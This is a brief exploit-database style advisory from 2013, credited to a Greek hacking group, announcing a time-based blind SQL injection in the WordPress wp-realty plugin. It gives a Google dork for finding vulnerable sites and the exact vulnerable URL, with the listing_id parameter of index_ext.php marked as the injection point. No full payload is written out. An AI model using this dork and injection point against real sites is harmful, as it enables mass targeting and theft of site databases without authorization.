WordPress WP Realty Blind SQL Injection

$$$$$$\      $$\   $$\     $$$$$$\ 

$$  __$$\     $$ |  $$ |   $$  __$$\

$$ /  \__|    $$ |  $$ |   $$ /  \__|

$$ |$$$$\     $$$$$$$$ |   \$$$$$$\ 

$$ |\_$$ |    $$  __$$ |    \____$$\

$$ |  $$ |    $$ |  $$ |   $$\   $$ |

\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |

 \______/ \__|\__|  \__|\__|\______/

 

# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection

# Google Dork: inurl:"/wp-content/plugins/wp-realty/"

# Vendor: [url]http://wprealty.org/[/url]

# Date: 10/08/2013

# Exploit Author: Napsterakos

 

 

Link: http://localhost/wordpress/wp-content/plugins/wp-realty/

 

Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]

 

 

Credits to: Greek Hacking Scene